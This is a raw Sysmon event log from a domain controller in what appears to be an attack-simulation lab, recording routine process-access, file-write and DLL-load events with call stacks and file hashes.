09:20:40.394{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054530Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.394{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054529Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.394{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054528Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.394{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054527Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.394{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054526Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.394{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054525Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.394{5EBD8912-8CC0-6151-1600-00000000FD01}12962024C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+4689|c:\windows\system32\themeservice.dll+3fdd|c:\windows\system32\themeservice.dll+3c53|c:\windows\system32\themeservice.dll+2675|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054524Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.394{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054523Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.394{5EBD8912-8CC0-6151-1600-00000000FD01}12961336C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054522Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.394{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054521Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.394{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054520Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.394{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054519Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.394{5EBD8912-8CC0-6151-1600-00000000FD01}12963524C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exe0x147aC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\themeservice.dll+3de3|c:\windows\system32\themeservice.dll+26c0|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054518Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.394{5EBD8912-8CC0-6151-1600-00000000FD01}12961336C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054517Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.394{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054516Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.394{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-0E00-00000000FD01}1008C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054515Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.394{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+396a|c:\windows\system32\SYSNTFY.dll+1fc3|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49e78|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054514Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.394{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+48674|C:\Windows\System32\RPCRT4.dll+31850|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054513Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.394{5EBD8912-8CBD-6151-0B00-00000000FD01}640680C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0900-00000000FD01}572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+48674|C:\Windows\System32\RPCRT4.dll+31850|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054512Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.362{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054511Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.362{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054510Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.362{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054509Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.331{5EBD8912-8CBD-6151-0B00-00000000FD01}640NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnsMD5=1ED9955C15C95D865A46A537998C900F,SHA256=A28BE6F8BD9359291F4A7F554196F44D63B6A5B945818C2F739AF0C137FB0AF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054508Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.316{5EBD8912-8CBD-6151-0B00-00000000FD01}640NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnbMD5=AD6267300552744C2B3E31C5F2AD26B4,SHA256=91C35BE1E016A08357DBA37710752F242763E2A6F81A8A63867A21B77CEF45C4,IMPHASH=00000000000000000000000000000000falsetrue 734700x80000000000000001054507Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.253{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\System32\svchost.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x80000000000000001054506Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.253{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054505Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.253{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054504Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.253{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054503Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 